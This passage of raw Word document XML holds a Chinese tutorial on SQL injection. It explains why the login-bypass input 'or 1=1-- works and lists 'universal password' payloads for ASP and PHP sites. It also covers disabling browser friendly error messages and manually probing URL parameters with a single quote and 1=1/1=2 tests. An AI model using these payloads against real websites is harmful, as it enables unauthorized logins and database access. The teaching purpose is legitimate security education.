        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00074D5E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2、现在我们来分析一下:'or 1=1--为什么能登录系统，原因有如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CA8C6B" w14:textId="77777777" w:rsidR="007D0922" w:rsidRDefault="007D0922" w:rsidP="007D0922">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、SELECT * FROM admin WHERE Name=''or 1=1 首先看这条查询语句，查询所有来自admin表的数据，条件name为空或者1=1，这两个条件只要一个满足就为真， Name=''or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1=1 现在1=1就是真而且是是没任何作用的真，那么最终数据库执行的语句相当于 select *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> from Admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3979B1D3" w14:textId="77777777" w:rsidR="007D0922" w:rsidRDefault="007D0922" w:rsidP="007D0922">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2</w:t>
      </w:r>
      <w:r>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因为Name值中输入了“--”注释符，后面语句被省略而登录成功。（常常的手法：前面加上'; ' (分号，用于结束前一条语句)，后边加上'--' (用于注释后边的语句)）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA7B409" w14:textId="77777777" w:rsidR="007D0922" w:rsidRDefault="007D0922" w:rsidP="007D0922">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w:t>
      </w:r>
      <w:r w:rsidR="008A57FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不同的程序万能密码也是不一样的，如ASP的万能密码是</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0596D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'or'='or'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP的万能密码是</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0596D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'or 1=1/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (如果在登陆窗口输入错误的语法出现报错一般说明存在sql注入)详细请看:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0596D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E0596D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://chengkers.lofter.com/post/14c64b_379726</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B28295" w14:textId="77777777" w:rsidR="007D0922" w:rsidRDefault="007D0922" w:rsidP="007D0922">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小提示：穿山甲如何post注入:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13484248" w14:textId="77777777" w:rsidR="007D0922" w:rsidRDefault="007D0922" w:rsidP="007D0922">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12807861" wp14:editId="6596EF16">
            <wp:extent cx="5278120" cy="4161103"/>
            <wp:effectExtent l="1905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8120" cy="4161103"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="562387D1" w14:textId="77777777" w:rsidR="007D0922" w:rsidRPr="001215FE" w:rsidRDefault="007D0922" w:rsidP="001215FE">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C1E3797" w14:textId="77777777" w:rsidR="00DC608B" w:rsidRPr="00DD695F" w:rsidRDefault="00150EBE" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD695F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>注入前</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD695F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>的准备</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD695F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD695F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>注入漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD695F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E476D74" w14:textId="4F3046B7" w:rsidR="00150EBE" w:rsidRPr="009E7F7C" w:rsidRDefault="001215FE" w:rsidP="001215FE">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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00076613">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>显</w:t>
      </w:r>
      <w:r w:rsidR="00D74CE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>示</w:t>
      </w:r>
      <w:r w:rsidR="00150EBE" w:rsidRPr="009E7F7C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>友好HTTP错误信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353ECD90" w14:textId="77777777" w:rsidR="007530D9" w:rsidRPr="00884779" w:rsidRDefault="00DC608B"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在进行SQL注入攻击时，需要利用到从服务器返回的各种出错信息，但是在浏览器中默认设置是不显示详细错误返回信息的，不论服务器返回什么错误，都只能看到“HTTP 500服务器错误”的窗口(图1)。因此，每次进行SQL注入攻击测试前，首先要取消IE浏览器返回信息设置，以便查看到注入攻击时返回的数据库信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4560DFA9" w14:textId="77777777" w:rsidR="007530D9" w:rsidRPr="00884779" w:rsidRDefault="007530D9"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打开IE浏览器，选择菜单“工具”一“Internet选项”命令，打开“Internet选项”对话框。打开“高级”选项卡，在“设置”列表框中找到“浏览组”，取消勾选“显示友好HTTP错误信息息”复选框(图2)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307121C6" w14:textId="77777777" w:rsidR="00150EBE" w:rsidRDefault="002C60E3" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="50" w:firstLine="105"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A5F14A1" wp14:editId="5CA74512">
            <wp:extent cx="2538068" cy="2495158"/>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554342" cy="2511157"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1811A28D" wp14:editId="7795BAFC">
            <wp:extent cx="2557173" cy="2504661"/>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62175" cy="2509560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F29786D" w14:textId="77777777" w:rsidR="002950D0" w:rsidRPr="002950D0" w:rsidRDefault="002950D0" w:rsidP="001215FE">
      <w:pPr>
        <w:ind w:firstLineChars="50" w:firstLine="90"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E7F7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>图1 错误页面返回信息被简化处理             图2显示友好HTTP错误信息息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FDE315" w14:textId="77777777" w:rsidR="00150EBE" w:rsidRPr="00EF21CE" w:rsidRDefault="001215FE" w:rsidP="001215FE">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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00150EBE" w:rsidRPr="00EF21CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>手工检测SQL注入点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFD95A3" w14:textId="77777777" w:rsidR="0068539A" w:rsidRPr="00884779" w:rsidRDefault="0068539A" w:rsidP="00A33737">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"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最常用的SQL注入点判断方法，是在网站中寻找如下形式的网页链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D62758A" w14:textId="77777777" w:rsidR="0068539A" w:rsidRPr="00884779"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ww.*****.com/***.asp?id=xx (ASP注入)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45441B7B" w14:textId="77777777" w:rsidR="0068539A" w:rsidRPr="00884779"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或者下面的链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DF0A55" w14:textId="77777777" w:rsidR="0068539A" w:rsidRPr="00884779"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ww.*****.com/***.php?id=xx (php注入)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679C581C" w14:textId="77777777" w:rsidR="0068539A" w:rsidRPr="00884779"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ww.*****.com/***.jsp?id=xx (jsp注入)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ED2653" w14:textId="77777777" w:rsidR="0068539A"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ww.*****.com/***.aspx?id=xx (aspx注入)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE43D87" w14:textId="77777777" w:rsidR="00742449" w:rsidRPr="00742449" w:rsidRDefault="00742449" w:rsidP="0074244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t>
      </w:r>
      <w:r w:rsidRPr="00742449">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>www.</w:t>
      </w:r>
      <w:r w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*****</w:t>
      </w:r>
      <w:r w:rsidRPr="00742449">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.com/index.asp?id=</w:t>
      </w:r>
      <w:r w:rsidR="00D42CFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00742449">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;page=</w:t>
      </w:r>
      <w:r w:rsidR="00D42CFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注:注入的时候确认是id参数还是page参数，工具默认只对后面page参数注入，所以要对工具进行配置</w:t>
      </w:r>
      <w:r w:rsidR="00D42CFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>或者手工调换</w:t>
      </w:r>
      <w:r w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00742449">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E195C28" w14:textId="77777777" w:rsidR="00742449" w:rsidRPr="00742449" w:rsidRDefault="00742449" w:rsidP="0074244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t>
      </w:r>
      <w:r w:rsidRPr="00742449">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>www.</w:t>
      </w:r>
      <w:r w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*****</w:t>
      </w:r>
      <w:r w:rsidRPr="00742449">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.com/index/new/id/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00742449">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 伪静态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF1249A" w14:textId="77777777" w:rsidR="00742449" w:rsidRPr="00884779" w:rsidRDefault="00742449" w:rsidP="0074244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http://</w:t>
      </w:r>
      <w:r w:rsidRPr="00742449">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>www.</w:t>
      </w:r>
      <w:r w:rsidRPr="00742449">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*****</w:t>
      </w:r>
      <w:r w:rsidRPr="00742449">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.com/index/new/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidRPr="00742449">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00742449">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00742449">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>伪静态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4715F905" w14:textId="77777777" w:rsidR="00150EBE" w:rsidRPr="00884779" w:rsidRDefault="0068539A"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其中的“**”可能是数字，也有可能是字符串，分别被称为整数类型数据和字符型数据。如何判断某个网页链接是否存在SQL注入漏洞呢?通常有两种检测方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FEFCD3" w14:textId="77777777" w:rsidR="005E1C9B" w:rsidRPr="00C215A8" w:rsidRDefault="005E1C9B" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="211"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C215A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>1.“单引号”法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4135F37C" w14:textId="77777777" w:rsidR="005E1C9B" w:rsidRPr="00884779" w:rsidRDefault="005E1C9B"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t>第一种检测SQL注入漏洞是否存在的方法是“单引号”法。方法很简单，直接在浏览器地址栏中的网址链接后加上一个单引号，如果页面不能正常显示，浏览器返回一些异常信息，则说明该链接可能存在注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCAA4CD" w14:textId="77777777" w:rsidR="005E1C9B" w:rsidRPr="00C215A8" w:rsidRDefault="005E1C9B" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="211"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C215A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>2. 1=1和1=2法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7221349F" w14:textId="77777777" w:rsidR="005E1C9B" w:rsidRPr="00884779" w:rsidRDefault="005E1C9B" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00884779">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
